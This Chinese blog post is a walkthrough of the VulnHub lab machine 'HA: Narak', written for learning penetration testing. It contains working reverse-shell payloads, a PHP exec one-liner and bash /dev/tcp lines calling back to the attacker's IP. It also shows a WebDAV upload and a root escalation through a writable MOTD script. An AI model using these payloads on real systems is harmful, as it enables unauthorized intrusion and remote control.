目录

写在开头

第一步：主机发现与端口扫描

第二步：Web渗透

第三步：tftp渗透

第四步：webdav利用

第五步：寻找敏感文件初步提权

第六步：motd利用提权

总结与思考

写在开头

 本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶，详述了打靶的每一步思路，并非复现writeup，读者耐心看完，定会有所收获。本靶机对于寻找渗透测试的思路很有启发。当nmap常规扫描没有明显收获且web目录爆破也进行不下去时，应当去寻找UDP端口的开放情况。靶机难度不高，但涉及了像许多先前暂未触及的知识，包括tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权。完整打靶思路详见：

「红队笔记」靶机精讲：Narak：不懂tftp、dav和motd渗透，就真的会觉得很brainfuck。_哔哩哔哩_bilibili

 本文针对的靶机源于vulnhub，详情见：

 HA: Narak ~ VulnHub

  下载链接见：

https://download.vulnhub.com/ha/narak.ova

 本靶机的目标是拿到两个flag，即user.txt和root.txt。顺道一提，这个靶机还挺有趣的，vulnhub中有这样一段相关描述，我这里直接翻译了： 

Narak在印度相当于地狱。你和地狱之主一起在深渊里。你能用你的hacking技能逃出Narak吗?燃烧的墙壁和恶魔无处不在，即使你最信任的工具也会在这次任务中背叛你。不要相信任何人。只要记住逃离Narak的终极咒语“枚举”。在取得root之后，你会同意“地狱是个不错的地方”。

 这描述还挺炫酷的，为什么说你最信任的工具也会在这次任务中背叛你？枚举的关键和目标又在何处？整个打靶下来回头看这个描述，确实还挺传神哈哈。

靶机下载成功后用vmware打开，将网络链接设置为NAT模式。靶机启动之后如下： 

第一步：主机发现与端口扫描

 虽然这一步是每个靶机的常规操作，但这个靶机的渗透过程却略显艰难，我们并没有从端口扫描的常规步骤得到想要的信息。我的kali的地址是10.10.10.128，扫描网段进行靶机的主机发现：

nmap -sn 10.10.10.0/24

发现靶机的地址是10.10.10.144，然后进行全端口扫描，-p-表示扫描所有端口，--min-rate 10000设定速率为10000：

nmap --min-rate 10000 -p- 10.10.10.144

 常规靶机的情况，仅仅开放了22和80端口，那大概率就是从80端口入手。再用默认脚本扫描查看这两个TCP端口的详细信息（服务版本、操作系统版本）：

nmap -sT -sV -sC -O -p22,80 10.10.10.144

能看到一些常规的信息。再尝试进行UDP扫描：

貌似UDP扫描啥也没看出来，再试试漏洞脚本扫描：

nmap --script=vuln -p22,80 10.10.10.144 

看到了一些目录枚举的路径，还有CSRF的漏洞，还是有点收获的。 

第二步：Web渗透

 从80端口入手，我们先用浏览器访问靶机ip试试，看看有啥思路：

直接点开就是一大堆图片，查看网页源代码也没太多信息，感觉也没有什么CMS可言，界面的最下方是about，但也没啥信息，最下面有一个按钮，写着do not click，意思说别点，难道会有什么可怕的东西？我就要点！

 点击末尾的这个Do Not Click后，发现跳转到了一个界面，是一幅漫画图片：

这漫画大家自己看吧，我就不解释了，咱也不是来看漫画的。发现url中有个images，估计是个目录，我们试着访问/images/：

 就是个图片的目录，也没太多信息，不过说不定以后能在这个目录上传shell，现在也不好说。 走到这里貌似web也没太多信息可利用。因此我们再进行一下目录爆破，看看有啥收获，这次我们使用gobuster，dir指定目录爆破，-w指定字典：

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.144

 可以发现有一个/webdav，那我们浏览器访问这个目录，发现需要认证，看来很可能这里就是个突破口。

 server-status目录没有太多信息：

 现在我们的核心思路应该就是寻找websav目录的凭据了。还有哪里我们没有寻找呢？此处想到了vulnhub页面的提示，“枚举”是关键。在使用gobuser进行爆破时，我们仅仅爆破了目录，没有对文件进行爆破，说不定一些关键文件就藏在其中，因此我们再次进行爆破，使用-x参数添加一些后缀名，包含可能的文件，比如rar/zip/txt/php/sql/html等等：

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x zip,rar,txt,sql,php,html -u http://10.10.10.144

 我感觉最大的收获就是发现了tips.txt（index.html就是初始页面），那么curl访问一下咯（也可以用浏览器）：

curl http://10.10.10.144/tips.txt   

 提示我们通往narak的门的线索可以在creds.txt找到，那么问题来了，creds.txt在哪里？难道也是在web目录可以直接访问的吗？

  哪有那么多低摘的果子，不可能这么简单。如果是我的话，走到这里就进行不下去了，接下来就跟着红队笔记大佬一起往下渗透吧。

第三步：tftp渗透

 此时思路受阻，我们知道需要寻找creds.txt，却不知道在哪里寻找。

我记得vulnhub的页面对于这个靶机的描述中有这样一句话： 燃烧的墙壁和恶魔无处不在，即使你最信任的工具也会在这次任务中背叛你。不要相信任何人。截至目前，我们用到了哪些工具呢？用nmap进行了主机发现和端口扫描，用gobuster进行了目录爆破。那会不会是我们被工具“背叛”了呢？莫非实际的结果并不是工具显示的那样？先说gobuster，我们进行web目录爆破可以用很多工具，其实没有本质区别，关键还是字典的问题，因此应该不是爆破工具的问题。莫非是nmap端口扫描的结果有误或者遗漏了什么？比如有可能遗漏了某些开放的UDP端口。（这段话是我看了红队笔记视频，自己再回想的时候想到的）

 我们当初端口扫描的时候显示没有任何开放的UDP端口，这里重新扫描一下，也是同样的结果。我们干脆尝试探测常见的UDP端口是否开放吧，先尝试top10常用的UDP端口：

nmap -sU --top-ports 10 10.10.10.144

确实，比如什么161,1434端口都是有可能开放的，但这些端口应该与我们要寻找creds.txt无关，再试试top20端口：

 nice，我们发现了tftp端口69，这是一个简单文件传输协议，用来在客户端和服务端进行文件传输，这个协议设计的时候是进行小文件传输的。因此它不具备通常的FTP的许多功能，它只能从文件服务器上获得或写入文件，不能列出目录，有兴趣的读者可以网上查查资料。下图源于百度百科：

 既然如此，那我们试试能不能用tftp协议，从靶机服务器把creds.txt下载下来，直接用tftp后接靶机地址即可连接靶机：

tftp 10.10.10.144

 不愧是简单文件传输协议，不能ls，好在我们已经知道我们的目标是获取creds.txt，那我们就尝试get一下了： 

get creds.txt

nice，下载下来了，我们输入quit退出tftp，然后查看这个creds.txt：

貌似是个base64编码，我们解码一下：

cat creds.txt | base64 -d

 yamdoot:Swarg 

 成功拿到了凭据，这很可能是最初webdav目录的访问凭据！

第四步：webdav利用

回到webdav页面：输入用户名yamdoot，密码Swarg，可以进入到如下的页面

 这个页面也没啥东西呀？此时就涉及到对webdav的了解了，webdav是一个基于HTTP1.1的通信新协议，允许客户端发布、锁定和管理 Web 上的资源，那么我们现在就是企图获取webdav的权限，据此拿到初始shell。

 此时kali中有许多工具可以充当webdav的客户端，其中有一个工具davtest，可以测试通过webdav能上传哪些后缀文件以及其对应权限：

davtest -url http://10.10.10.144/webdav -auth yamdoot:Swarg 

 可以看到上传的文件类型如下：

基本上都可以上传，再看一下执行权限：

 发现是可以执行php文件的，因此我们可以尝试上传php类型的反弹shell，先编写一个shell.php，注意要写kali的ip：

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>

 然后再利用一个客户端。把shell.php上传，此处使用的webdav客户端是cadaver：

cadaver http://10.10.10.144/webdav
输入用户名和密码(yamdoot:Swarg)
put shell.php

回到浏览器，可以看到我们上传的shell，那个DavTestDir_是我们刚刚用testdav工具尝试上传的目录：

此时我们开启nc监听1234端口，然后访问shell.php，即可触发反弹shell 

nc -lvnp 1234

第五步：寻找敏感文件初步提权

此时我们拿到了www-data的shell，通常我会sudo -l查看有什么可以利用的二进制文件，先用python3增强交互性后运行sudo -l结果显示需要密码：

python3 -c "import pty;pty.spawn('/bin/bash')"

 下一步就是可以查看计划任务、备份文件、suid的文件、可写文件等，总之寻找有没有一些ssh登录的凭据或是可以利用的提权文件：最终通过查找可写的文件发现了一些端倪：

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null

发现了一个可编辑的bash脚本hell.sh，还有一个users.password，除此之外还有一些update-motd.d下的文件，查看这个user.password，如下：

看来就是webdav的登录凭据，应该不是我们要找的ssh凭据。那查看hell.sh：

可以看到一行奇怪的文字：

 --[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

 有CTF的经验就可以知道，这是一种名为brainfuck的编程语言！

可是咱也不太懂这个语言，可以用beef工具进行解释，首先将brainfuck的字符存为一个文件hell.bf，然后用beef解释器翻译一下：

beef hell.bf

  解出了一串字符：

chitragupt 

这很可能是ssh的一个密码，那么是哪个用户名呢？我们可以查看/etc/passwd，寻找哪些账户有shell环境：

可以发现重点就是narak,yamdoot,inferno三个用户，依次尝试一下就可以发现chitragupt是用户inferno的ssh密码：

ssh inferno@10.10.10.144

第六步：motd利用提权

此时我们拿到了inferno的权限，先查看当前目录有啥：

意料之中，拿到了第一个flag即user.txt。下面的目标就是提权到root了。sudo -l也是此路不通

 因此接下来有两种大致思路，其一，和刚才类似，继续寻找高权限的凭据，也就是root的ssh凭据，其二：利用一些root高权限的工具/可执行文件/脚本等实现提权。同样，一番搜索之后，最终发现了一些能够利用的具有可写权限的文件：

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null

重点关注motd相关的文件，我们进入/etc/update-motd.d/，然后查看相关文件的权限：

MOTD（Message of the Day）是Linux系统登录时显示的一段信息，我们要重点关注00-header，这是linux在登录时会运行的显示欢迎信息的脚本，可以发现这个就脚本的所有者和所在组都是root，且此时inferno用户拥有对该文件的写权限，因此我们只要在这个文件中添加反弹shell的代码，当该脚本执行时即可触发反弹shell，我们先查看一下这个文档：

然后我们通过vi工具编辑，或通过echo追加的方式，在其中添加反弹shell代码：

echo "bash -c 'bash -i >& /dev/tcp/10.10.10.128/4444 0>&1'" >> 00-header

 然后在kali中nc监听4444端口

 重新ssh登录inferno用户触发00-header脚本执行，从而触发反弹shell，又由于运行这个脚本时是具有root权限的（此处我有点疑惑），成功触发了反弹shell，且反弹的是root的shell，也就是提权成功了！

其中第二个flag是在root目录下的root.txt:

 至此打靶完成！ 

总结与思考

 打这个靶机感觉还挺有收获的，主要是有一些先前不了解的知识点。比如tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权等等。回看vulnhub对于靶机的描述：

Narak在印度相当于地狱。你和地狱之主一起在深渊里。你能用你的hacking技能逃出Narak吗?燃烧的墙壁和恶魔无处不在，即使你最信任的工具也会在这次任务中背叛你。不要相信任何人。只要记住逃离Narak的终极咒语“枚举”。在取得root之后，你会同意“地狱是个不错的地方”。

 还挺有感触的哈。我们被信任的工具nmap背叛了，nmap原以为没有UDP端口开放的，结果最后发现了tftp的69端口，这才有了寻找creds.txt的思路。 同时我们也通过不断的枚举找到了tips.txt，提示我们去寻找creds.txt。不过我并不认为“地狱是个不错的地方”，或许我们可以通过靶机这个地狱学习渗透的知识吧，哈哈。最后还是总结一下打靶的思路：

1.主机发现和端口扫描：常规思路，发现22和80端口，应该要从web入手。起初并未发现UDP端口。

2.Web渗透：目录爆破发现关键目录webdav，但访问需要凭据。文件爆破找到关键文件tips.txt，提示我们去寻找creds.txt

3.tftp渗透：回头再去寻找UDP端口，发现tftp端口可能开放，尝试利用这个协议读取creds.txt，下载成功，成功访问webdav。

4.webdav利用获取初始立足点：webdav貌似是个空目录，但它其实是一个基于HTTP1.1的通信新协议，允许客户端发布、锁定和管理 Web 上的资源。使用davtest测试webdav可以上传和执行哪些文件，发现可以上传并执行php，利用cadaver客户端上传反弹shell的php文件并访问shell.php，成功反弹了www-data的shell，获得了初始立足点。

5.寻找敏感文件初步提权，尝试查看sudo权限文件、计划任务、备份文件、suid的文件、可写文件等，最后在可写文件中发现了一个hell.sh，其中有一段brainfuck代码，用beef工具解码得到了一串字符，经尝试发现是用户名inferno的ssh密码。

6.motd利用提权：利用对00-header文件的可写权限，这是linux在登录时会运行的显示欢迎信息的脚本，在这个文件中添加反弹shell的代码，当该脚本执行时（再次登录ssh时）即可触发反弹shell。

不过我还有个小问题没解决：最后利用motd提权的时候添加反弹shell后再次登录为啥反弹的是root的shell啊，为什么不是反弹inferno的shell呢？毕竟登录的ssh用户是inferno。是motd的机制隐含了root的权限吗？ 可以回头再查查资料研究一下。

 到此这个靶机就讲解完毕了。打完这个靶机感觉还是挺有收获的，有很多新的知识点。靶机不难，总结不易，也有很多自己的思考，希望读者能够点赞关注多多支持！学渗透还是要实操呀。如果读者有什么打靶的问题也欢迎评论区留言指出，我一定知无不言！